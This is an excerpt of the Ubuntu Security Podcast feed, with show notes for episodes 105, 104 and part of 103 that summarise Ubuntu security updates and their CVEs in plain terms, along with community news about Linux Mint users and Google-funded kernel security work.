          <dc:creator></dc:creator>
          <guid>d7e05c6a419fcf89029f94175d43fffa4b8846d99a3c112920035f23f76ad445ed7fec71a0e75e70b61b4fb73114f4341cce4426f1cd4c1da49dc2a7f7cce45a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 105</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we discuss security updates in Linux Mint, Google funding Linux
  kernel security development and details for security updates in BIND,
  OpenSSL, Jackson, OpenLDAP and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we discuss security updates in Linux Mint, Google funding Linux
  kernel security development and details for security updates in BIND,
  OpenSSL, Jackson, OpenLDAP and more.
  </itunes:summary>
        <description>  This week we discuss security updates in Linux Mint, Google funding Linux
  kernel security development and details for security updates in BIND,
  OpenSSL, Jackson, OpenLDAP and more.
  </description>
        <googleplay:description>  This week we discuss security updates in Linux Mint, Google funding Linux
  kernel security development and details for security updates in BIND,
  OpenSSL, Jackson, OpenLDAP and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we discuss security updates in Linux Mint, Google funding Linux
kernel security development and details for security updates in BIND,
OpenSSL, Jackson, OpenLDAP and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>14 unique CVEs addressed</p>
<h3 id="usn-4737-1-bind-vulnerability-00-45">[<a href="https://ubuntu.com/security/notices/USN-4737-1">USN-4737-1</a>] Bind vulnerability [00:45]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8625">CVE-2020-8625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>If using GSS-TSIG could be vulnerable to a DoS or possible RCE - this
option is not enabled by default BUT is often used when bind is
integrated with Samba or with a AD-DC. In Ubuntu we confine BIND with an
AppArmor profile by default isolates BIND quite tightly so helps to
mitigate any affect a possible RCE attack could have.
<ul>
<li>Was interesting to see upstream released <a href="https://www.openwall.com/lists/oss-security/2021/02/19/1">2</a> <a href="https://www.openwall.com/lists/oss-security/2021/02/20/2">advisories</a> that some of
their upstream version updates (e.g. 9.16.12) for this caused some
regressions as this included some new as well features - and they
specifically ended up recommended downstreams ship the prior version
(9.16.11) with just the fix for this backported - this is what we do in
Ubuntu precisely for this reason, to minimise the chance of introducing
regressions in our security updates by only backporting the patch for
the particularly vulnerability</li>
</ul>
</li>
</ul>
<h3 id="usn-4738-1-openssl-vulnerabilities-02-13">[<a href="https://ubuntu.com/security/notices/USN-4738-1">USN-4738-1</a>] OpenSSL vulnerabilities [02:13]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23841">CVE-2021-23841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23840">CVE-2021-23840</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref when parsing malicious issuer fields in X509
certificates - crash, DoS</li>
<li>Possible buffer overflow if some library functions were used in an
unlikely manner - had to specify an input length that was close to the
bounds of an integer size of the platform - so only if calling with a
buffer of INT_MAX or similar could this be an issue</li>
</ul>
<h3 id="usn-4745-1-openssl-vulnerabilities-02-56">[<a href="https://ubuntu.com/security/notices/USN-4745-1">USN-4745-1</a>] OpenSSL vulnerabilities [02:56]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23841">CVE-2021-23841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1971">CVE-2020-1971</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL ptr deref above plus separate NULL pointer deref in handling of
EDIPartyNames as discussed in <a href="https://ubuntusecuritypodcast.org/episode-100/">Episode 100</a></li>
</ul>
<h3 id="usn-4739-1-webkitgtk-vulnerability-03-25">[<a href="https://ubuntu.com/security/notices/USN-4739-1">USN-4739-1</a>] WebKitGTK vulnerability [03:25]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13558">CVE-2020-13558</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in audio handling - specially crafted webpage could cause an RCE on
local machine</li>
</ul>
<h3 id="usn-4741-1-jackson-vulnerabilities-03-40">[<a href="https://ubuntu.com/security/notices/USN-4741-1">USN-4741-1</a>] Jackson vulnerabilities [03:40]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10172">CVE-2019-10172</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7525">CVE-2017-7525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15095">CVE-2017-15095</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>JSON processor for Java - allows to map JSON to Java objects</li>
<li>Flaws in (de)serialization could expose various classes to being mapped
to the resulting input and hence allow a remote code execution attack -
fix is to deny various classes being mapped as a result</li>
<li>Also fixed an XML external entity issue that could also result in RCE</li>
</ul>
<h3 id="usn-4740-1-apache-shiro-vulnerabilities-04-20">[<a href="https://ubuntu.com/security/notices/USN-4740-1">USN-4740-1</a>] Apache Shiro vulnerabilities [04:20]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1957">CVE-2020-1957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11989">CVE-2020-11989</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different possible authentication bypass issues when using with Spring
dynamic controllers</li>
</ul>
<h3 id="usn-4742-1-django-vulnerability-04-33">[<a href="https://ubuntu.com/security/notices/USN-4742-1">USN-4742-1</a>] Django vulnerability [04:33]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23336">CVE-2021-23336</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible web-cache poisoning attack - due to difference in handling of
requests between the proxy and the server - malicious requests can be
cached as they look like safe ones due to difference in interpretation</li>
</ul>
<h3 id="usn-4743-1-gdk-pixbuf-vulnerability-05-06">[<a href="https://ubuntu.com/security/notices/USN-4743-1">USN-4743-1</a>] GDK-PixBuf vulnerability [05:06]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20240">CVE-2021-20240</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer underflow in GIF loader - code execution?</li>
</ul>
<h3 id="usn-4744-1-openldap-vulnerability-05-27">[<a href="https://ubuntu.com/security/notices/USN-4744-1">USN-4744-1</a>] OpenLDAP vulnerability [05:27]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27212">CVE-2021-27212</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Assertion failure could be triggered by crafted timestamp content -&gt; crash, DoS</li>
</ul>
<h3 id="usn-4467-3-qemu-regression-05-46">[<a href="https://ubuntu.com/security/notices/USN-4467-3">USN-4467-3</a>] QEMU regression [05:46]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13754">CVE-2020-13754</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>In patching previous vulnerabilities in QEMU, we backported various
patches but missed some related to riscv emulation so would cause a
possible crash in this case - fixed to add missing patches to resolve
this crash issue</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-mint-users-being-slow-with-security-updates-running-old-versions-06-33">Linux Mint users being slow with security updates, running old versions [06:33]</h3>
<ul>
<li><a href="https://www.zdnet.com/article/top-linux-distro-tells-users-stop-using-out-of-date-versions-update-your-software-now/">https://www.zdnet.com/article/top-linux-distro-tells-users-stop-using-out-of-date-versions-update-your-software-now/</a></li>
<li><a href="https://www.theregister.com/2021/02/23/linux_mint_team_berates_users/">https://www.theregister.com/2021/02/23/linux_mint_team_berates_users/</a></li>
<li><a href="https://blog.linuxmint.com/?p=4030">https://blog.linuxmint.com/?p=4030</a></li>
<li>Blog post from lead developer Clem (Clement Lefebvre) discussing how
Linux Mint users seem to not be installing updates</li>
<li>Linux Mint is a Ubuntu derivative - uses the Ubuntu archives plus some of
their own repos - so in general all security updates for Ubuntu get
propagated to Linux Mint - cf. relationship between Ubuntu and Debian.</li>
<li>Interesting history in regards to security
<ul>
<li>In Febrary 2016, website was hacked and the link to the installer ISO
was modified to point to a malicious one with a backdoor -
<a href="https://blog.linuxmint.com/?p=2994">https://blog.linuxmint.com/?p=2994</a></li>
<li>Recommend to turn of UEFI Secure Boot since their shim is not signed by
Microsoft</li>
<li>Update Manager would offer security updates but would rate them in
supposed terms of safety - so would in essence deter users from
installing some security updates - and also would not select to install
some updates which they deemed as more risky - but how did they assign
this safety level? Based more on if a component was critical to boot
(kernel/firmware would get rated as more risky) than anything to do
with the actual update itself. So was intended to help guide users BUT
created a system where users believed they were &ldquo;safer&rdquo; in terms of
stability, but in fact were less safe in terms of security.</li>
<li>This created an impression that Linux Mint either blocked security
updates or actively discouraged users from installing them -
<a href="https://distrowatch.com/weekly.php?issue=20170320#myth">https://distrowatch.com/weekly.php?issue=20170320#myth</a></li>
<li>These levels were removed in the 19.2 release but it seems users are
still wary</li>
</ul>
</li>
<li>30% of users apply updates in less than a week (based on recent Firefox update)</li>
<li>30% of users are still running 17.x - EOLd in April 2019 - (based on
Ubuntu 14.04)</li>
<li>So it is not really surprising given their past history that their
userbase is wary of security updates and are perhaps putting themselves
at risk as a result by delaying installing security updates</li>
<li>But good to see they are now actively encouraging users to install
security updates</li>
<li>Use of timeshift is interesting as a mitigation against possible issues
with security updates</li>
<li>Also was interesting to see they published an emergency update just for
Firefox for the 17.x release to upgrade this from 66.0 to 78 ESR - so
this gives some protection but perhaps again lessens the incentive for
these users to upgrade to a newer supported release of Linux Mint</li>
</ul>
<h3 id="google-funds-linux-kernel-developers-to-work-exclusively-on-security-14-20">Google funds Linux kernel developers to work exclusively on security [14:20]</h3>
<ul>
<li><a href="https://www.linuxfoundation.org/en/press-release/google-funds-linux-kernel-developers-to-focus-exclusively-on-security/">https://www.linuxfoundation.org/en/press-release/google-funds-linux-kernel-developers-to-focus-exclusively-on-security/</a></li>
<li>Gustavo Silva and Nathan Chancellor</li>
<li>Chancellor - Triaging and fixing bugs found via Clang/LLVM, CI systems
<ul>
<li>Already leading a lot of the upstream ClangBuiltLinux work</li>
</ul>
</li>
<li>Silva - KSPP related work on eliminating bug classes - VLAs etc</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E105.mp3" length="13486792" type="audio/mpeg" /><itunes:duration>17:03</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 104
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-104/</link>
          <pubDate>Fri, 19 Feb 2021 22:44:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>5eb5c603913580dc9d78b20d69eb0846dd6cb3ef3e8dde9de21f10667b8ee1b18d2da7b62333910e8e91b15adcaea8c8cfbb7d28d0091a904255e2a9e153ea82</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 104</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a look at a long-awaited update of Thunderbird in Ubuntu
  20.04LTS, plus security updates for Open vSwitch, JUnit 4, PostSRSd, GNOME
  Autoar and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a look at a long-awaited update of Thunderbird in Ubuntu
  20.04LTS, plus security updates for Open vSwitch, JUnit 4, PostSRSd, GNOME
  Autoar and more.
  </itunes:summary>
        <description>  This week we take a look at a long-awaited update of Thunderbird in Ubuntu
  20.04LTS, plus security updates for Open vSwitch, JUnit 4, PostSRSd, GNOME
  Autoar and more.
  </description>
        <googleplay:description>  This week we take a look at a long-awaited update of Thunderbird in Ubuntu
  20.04LTS, plus security updates for Open vSwitch, JUnit 4, PostSRSd, GNOME
  Autoar and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a look at a long-awaited update of Thunderbird in Ubuntu
20.04LTS, plus security updates for Open vSwitch, JUnit 4, PostSRSd, GNOME
Autoar and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>14 unique CVEs addressed</p>
<h3 id="usn-4729-1-open-vswitch-vulnerability-00-55">[<a href="https://ubuntu.com/security/notices/USN-4729-1">USN-4729-1</a>] Open vSwitch vulnerability [00:55]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35498">CVE-2020-35498</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most convoluted CVE description: A vulnerability was found in
openvswitch. A limitation in the implementation of userspace packet
parsing can allow a malicious user to send a specially crafted packet
causing the resulting megaflow in the kernel to be too wide, potentially
causing a denial of service. The highest threat from this vulnerability
is to system availability.</li>
</ul>
<h3 id="usn-4731-1-junit-4-vulnerability-02-05">[<a href="https://ubuntu.com/security/notices/USN-4731-1">USN-4731-1</a>] JUnit 4 vulnerability [02:05]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15250">CVE-2020-15250</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Tests that used rule TemporaryFolder would use /tmp which is world
accessible - so contents could be read by other users - so if tests were
writing API keys or passwords these would be able to be read by others
users -&gt; info disclosure. Fixed to create temp directory with permissions
so it is only readable by the owner.</li>
</ul>
<h3 id="usn-4730-1-postsrsd-vulnerability-02-57">[<a href="https://ubuntu.com/security/notices/USN-4730-1">USN-4730-1</a>] PostSRSd vulnerability [02:57]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35573">CVE-2020-35573</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Postfix Sender Rewriter Scheme Daemon - Used for rewriting sender email
addresses when forwarding emails from hosts that use SPF - rewrites the
address to appear to come from your hosts address and allows you to do
the inverse and appropriately handle and bounces etc by reverse-rewriting
the sender address to recover the original address</li>
<li>Could cause a CPU based DoS by excessive processing if an email contained
an exceedingly long SRS timestamp - fixed to just reject those which are
past the expected regular size</li>
</ul>
<h3 id="usn-4732-1-sqlite-vulnerability-04-20">[<a href="https://ubuntu.com/security/notices/USN-4732-1">USN-4732-1</a>] SQLite vulnerability [04:20]</h3>
<ul>
<li>1 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20227">CVE-2021-20227</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Only affected more recent releases of sqlite - could cause a crash on
particular query constructs</li>
</ul>
<h3 id="usn-4733-1-gnome-autoar-vulnerability-04-42">[<a href="https://ubuntu.com/security/notices/USN-4733-1">USN-4733-1</a>] GNOME Autoar vulnerability [04:42]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36241">CVE-2020-36241</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Another archive extraction symlink traversal issue - gnome-autoar is a
library used by nautilus and other gnome components when handling
archives - ie right click an archive in nautilus and select &ldquo;extract
here&rdquo;</li>
<li>If an archive contained a file whose parent was a symlink that pointed
outside the destination directory, would blindly follow the symlink and
overwrite arbitrary files - instead fixed to check if is a symlink with
an absolute target OR one that points outside the destination folder via
relative path and reject in that case</li>
</ul>
<h3 id="usn-4734-1-usn-4734-2-wpa-supplicant-and-hostapd-vulnerabilities-06-01">[<a href="https://ubuntu.com/security/notices/USN-4734-1">USN-4734-1</a>, <a href="https://ubuntu.com/security/notices/USN-4734-2">USN-4734-2</a>] wpa_supplicant and hostapd vulnerabilities [06:01]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12695">CVE-2020-12695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0326">CVE-2021-0326</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible OOB write when doing a wifi-direct / p2p search - so an attacker
just has to be in radio range when the victim performs a P2P discovery
aka wifi direct search - discovered by Google&rsquo;s OSS-Fuzz project</li>
<li>CallStranger (<a href="https://ubuntusecuritypodcast.org/episode-91/">Episode 91</a>) - UPnP callback reflection</li>
</ul>
<h3 id="usn-4735-1-postgresql-vulnerability-07-23">[<a href="https://ubuntu.com/security/notices/USN-4735-1">USN-4735-1</a>] PostgreSQL vulnerability [07:23]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3393">CVE-2021-3393</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest upstream 12.6 release to fix a possible info leak which could
occur when handling particular errors - if a user had the permission to
UPDATE on a partitioned table but not the SELECT privilege on some column
and tried to UPDATE on that column, the resulting error message
concerning this constraint violation could leak values on the columns
which the user did not have permission. Rare setup so unlikely to be
affected in practice.</li>
</ul>
<h3 id="usn-4736-1-thunderbird-vulnerabilities-08-18">[<a href="https://ubuntu.com/security/notices/USN-4736-1">USN-4736-1</a>] Thunderbird vulnerabilities [08:18]</h3>
<ul>
<li>6 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15685">CVE-2020-15685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23964">CVE-2021-23964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23960">CVE-2021-23960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23954">CVE-2021-23954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23953">CVE-2021-23953</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26976">CVE-2020-26976</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Update to latest upstream release 78.7, usual spread of issues for TB
(derived from firefox) - DoS, info leak, RCE. Also possible response
injection attack from a person-in-the-middle during STARTTLS connection
setup - ie could inject unencrypted response which would then be
evaluated <strong>after</strong> the encrypted connection was setup so would get treated
as coming from the trusted host.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="thunderbird-to-be-upgraded-to-78-dot-x-in-ubuntu-20-dot-04-lts-09-32">Thunderbird to be upgraded to 78.x in Ubuntu 20.04 LTS [09:32]</h3>
<ul>
<li>Lead by oSoMoN (Olivier Tilloy) from Desktop Team</li>
<li>68.x no longer supported upstream and not really practical to backport
security fixes for this old codebase</li>
<li>78.x as a new major version introduces a bunch of breaking changes, in
particular with handling of PGP - previously TB had no native support for
PGP but Enigmail addon provided this</li>
<li>Now does support PGP itself and enigmail is not supported anymore - new
internal PGP is a bit different and requires migration - this should be
handled automatically by the new version to migrate existing enigmail
users across</li>
<li>A couple other packages tinyjsd and junit are also not supported by TB 78
<ul>
<li>tinyjsd - JS debugger with a particular focus on being able to debug TB
extensions etc</li>
<li>jsunit - unit testing tool for TB to allow add-on developers to setup
unit tests for their extensions and to run these in TB/FF etc</li>
<li>these will be replaced by empty packages in the Ubuntu archive for
20.04</li>
</ul>
</li>
<li>Once this is done will then look to do Bionic (18.04 LTS) as well</li>
<li><a href="https://discourse.ubuntu.com/t/thunderbird-lts-update/20819">https://discourse.ubuntu.com/t/thunderbird-lts-update/20819</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E104.mp3" length="11053798" type="audio/mpeg" /><itunes:duration>14:18</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 103
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-103/</link>
          <pubDate>Fri, 12 Feb 2021 14:07:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>a31dcf82f68470a08cc637ae5fa575f137f3c8d34cdf10b83cbd71865ed5a4d42d5be9fa6e363a42ee60d639fccdc0c2648a808bb9b08ea9034bde6bfe68fff8</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 103</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a deep dive look at 2 recent vulnerabilities in the
  popular application containerisation frameworks, snapd and flatpak, plus we
  cover security updates for MiniDLNA, PHP-PEAR, the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a deep dive look at 2 recent vulnerabilities in the
  popular application containerisation frameworks, snapd and flatpak, plus we
  cover security updates for MiniDLNA, PHP-PEAR, the Linux kernel and more.
  </itunes:summary>
        <description>  This week we take a deep dive look at 2 recent vulnerabilities in the
  popular application containerisation frameworks, snapd and flatpak, plus we
  cover security updates for MiniDLNA, PHP-PEAR, the Linux kernel and more.
  </description>
        <googleplay:description>  This week we take a deep dive look at 2 recent vulnerabilities in the
  popular application containerisation frameworks, snapd and flatpak, plus we
  cover security updates for MiniDLNA, PHP-PEAR, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a deep dive look at 2 recent vulnerabilities in the
popular application containerisation frameworks, snapd and flatpak, plus we
cover security updates for MiniDLNA, PHP-PEAR, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>26 unique CVEs addressed</p>
<h3 id="usn-4720-2-apport-vulnerabilities-00-53">[<a href="https://ubuntu.com/security/notices/USN-4720-2">USN-4720-2</a>] Apport vulnerabilities [00:53]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25684">CVE-2021-25684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25683">CVE-2021-25683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25682">CVE-2021-25682</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-102/">Episode 102</a></li>
</ul>
<h3 id="usn-4721-1-flatpak-vulnerability-01-06">[<a href="https://ubuntu.com/security/notices/USN-4721-1">USN-4721-1</a>] Flatpak vulnerability [01:06]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21261">CVE-2021-21261</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Flatpak sandbox escape - Flatpak isolates applications inside their own
mount / user / etc namespaces - allows sandboxed applications to
communicate with the host via various portals - ie. open a file via a
file chooser portal (aka powerbox)</li>
<li>Portal D-Bus service provides the ability to launch other subprocesses in
a new sandbox instance, following a NNP model (ie same or less privileges
as caller) (eg. used by sandboxed webbrowers to process untrusted content
inside less privileged subprocesses)</li>
<li>Would previous allow a confined process to specify various environment
variables which would then get passed to the `flatpak run` command to
launch the new subprocess in its own sandbox - so fix is to sanitize
environment variables</li>
</ul>
<h3 id="usn-4722-1-readymedia--minidlna--vulnerabilities-01-11">[<a href="https://ubuntu.com/security/notices/USN-4722-1">USN-4722-1</a>] ReadyMedia (MiniDLNA) vulnerabilities [01:11]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28926">CVE-2020-28926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12695">CVE-2020-12695</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible RCE via malicious UPnP requests - could send with chunked
encoding, this would exploit a signdness bug leading to a heap buffer
overflow</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-91/">Episode 91</a> - &ldquo;CallStranger&rdquo; - UPnP spec didn&rsquo;t forbid subscription
requests with a URL on a different network segment - could allow an
attacker to cause a miniDLNA server to DoS a different endpoint</li>
</ul>
<h3 id="usn-4723-1-pear-vulnerability-02-30">[<a href="https://ubuntu.com/security/notices/USN-4723-1">USN-4723-1</a>] PEAR vulnerability [02:30]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36193">CVE-2020-36193</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Improper handling of symlinks in archives could result in arbitrary file
overwrite via directory traversal - since PHP PEAR runs installer as
root, could then overwrite arbitrary files as root and priv esc / code
execution etc</li>
</ul>
<h3 id="usn-4724-1-openldap-vulnerabilities-03-14">[<a href="https://ubuntu.com/security/notices/USN-4724-1">USN-4724-1</a>] OpenLDAP vulnerabilities [03:14]</h3>
<ul>
<li>10 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36230">CVE-2020-36230</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36229">CVE-2020-36229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36228">CVE-2020-36228</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36227">CVE-2020-36227</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36223">CVE-2020-36223</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36226">CVE-2020-36226</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36225">CVE-2020-36225</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36224">CVE-2020-36224</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36222">CVE-2020-36222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36221">CVE-2020-36221</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues</li>
</ul>
<h3 id="usn-4725-1-qemu-vulnerabilities-03-20">[<a href="https://ubuntu.com/security/notices/USN-4725-1">USN-4725-1</a>] QEMU vulnerabilities [03:20]</h3>
<ul>
<li>6 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20181">CVE-2021-20181</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29443">CVE-2020-29443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28916">CVE-2020-28916</a> <!-- raw HTML omitted --></li>
